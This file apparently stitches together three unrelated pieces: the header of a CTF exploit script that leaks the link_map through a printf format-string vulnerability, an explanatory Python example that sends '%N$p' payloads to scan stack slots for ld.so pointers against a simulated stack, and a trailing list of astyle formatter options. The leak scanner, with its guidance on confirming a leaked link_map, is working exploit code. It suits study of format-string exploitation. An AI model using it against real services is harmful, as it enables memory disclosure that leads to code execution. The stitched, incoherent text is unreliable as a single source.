#!/usr/bin/env python2
'''
This is not really portable.
I had to guess link_map_address on the server (not really complex because of no ASLR).
With ASLR (local testing) it works by leaking the address to the link_map in the initial printf vulnerability.
The fact that this didn't work on the server indicates that the position of these variables on the stack depends on the libc version.
'''
local = False
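The note above describes the one portable part of the approach: instead of hardcoding which printf argument slot holds the link_map pointer (that offset moves between libc versions), scan the slots with `%N$p` leaks and keep only the words that fall inside ld.so, where the main program's link_map (ld.so's static `_dl_main_map`) lives. The following is an added example written for this page, not the gist's own exploit: the `send` transport, the fake stack contents and every address in it are constructed stand-ins, and `scan_stack` is where a real socket or process handle would be plugged in.

```python
#!/usr/bin/env python3
# Added example (not the gist's code): scan a printf format-string leak for a
# pointer into ld.so, the mapping that holds the main program's link_map.
# The target I/O below is a constructed stand-in; all addresses are made up.
import re

_PREFIX = b"LEAK:"   # marker so our leak can be found among other program output


def leak_payload(index: int) -> bytes:
    """Format string that makes printf print vararg slot `index` as a pointer."""
    return _PREFIX + b"%" + str(index).encode() + b"$p"


_PTR_RE = re.compile(rb"LEAK:(0x[0-9a-f]+|\(nil\))")


def parse_leak(output: bytes):
    """Leaked word as int, 0 for '(nil)', or None if the leak was not echoed back."""
    m = _PTR_RE.search(output)
    if not m:
        return None
    tok = m.group(1)
    return 0 if tok == b"(nil)" else int(tok, 16)


def scan_stack(send, lo: int, hi: int, first: int = 1, last: int = 40):
    """
    send(payload) -> bytes is the transport (socket or local process; hypothetical here).
    Returns [(slot, value)] for every slot whose value lies in [lo, hi), i.e. inside the
    mapping where the wanted structure lives. Scanning instead of hardcoding a slot is
    what survives a change of libc version; the base range still has to come from
    /proc/<pid>/maps, a separate leak, or a no-ASLR assumption.
    """
    hits = []
    for i in range(first, last + 1):
        val = parse_leak(send(leak_payload(i)))
        if val is not None and lo <= val < hi:
            hits.append((i, val))
    return hits


# --- constructed stand-in for the vulnerable server -------------------------------
# Slot numbering follows x86-64 printf varargs: %1$p..%5$p read the remaining argument
# registers, %6$p onward reads the stack. Values are invented for the example.
LD_BASE, LD_SIZE = 0x7ffff7fc3000, 0x3f000          # pretend ld.so mapping
FAKE_STACK = {
    1: 0x7fffffffe0a0, 2: 0x0,            3: 0x7ffff7e9b4a0,  # libc pointer, out of range
    4: 0x7fffffffe3f8, 5: 0x4011d6,       6: 0x41414141,      # start of our own buffer
    7: 0x7ffff7ffe190,                                        # pointer into ld.so .data
    8: 0x1,            9: 0x7ffff7dd0000,                     # libc base, out of range
}


def fake_send(payload: bytes) -> bytes:
    """Emulates printf(user_input) over FAKE_STACK, with a banner line as noise."""
    m = re.fullmatch(rb"LEAK:%(\d+)\$p", payload)
    idx = int(m.group(1))
    val = FAKE_STACK.get(idx)
    if val is None:          # past our fake frame: a real target would print junk or crash
        return b"segfault"
    word = b"(nil)" if val == 0 else b"0x%x" % val
    return b"welcome\n" + _PREFIX + word + b"\n"


def find_link_map_candidates():
    """Every leaked slot that points into the (pretend) ld.so mapping."""
    return scan_stack(fake_send, LD_BASE, LD_BASE + LD_SIZE, last=12)


if __name__ == "__main__":
    for slot, val in find_link_map_candidates():
        print("slot %d -> %#x" % (slot, val))
```

On a real target the candidates still need confirming, for example by leaking `%N$s` at the candidate and checking that the first field (`l_addr`) is a plausible load offset; with several hits, the one whose neighbourhood looks like a link_map chain (`l_next`/`l_prev` pointers into the same mapping) is the one to use.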
--style=allman
--indent=spaces=2
--indent-switches
--indent-namespaces
--min-conditional-indent=0
# --max-instatement-indent=0 too bad, this value has to be 40 at minimum
--pad-oper
--pad-header
--unpad-paren
--delete-empty-lines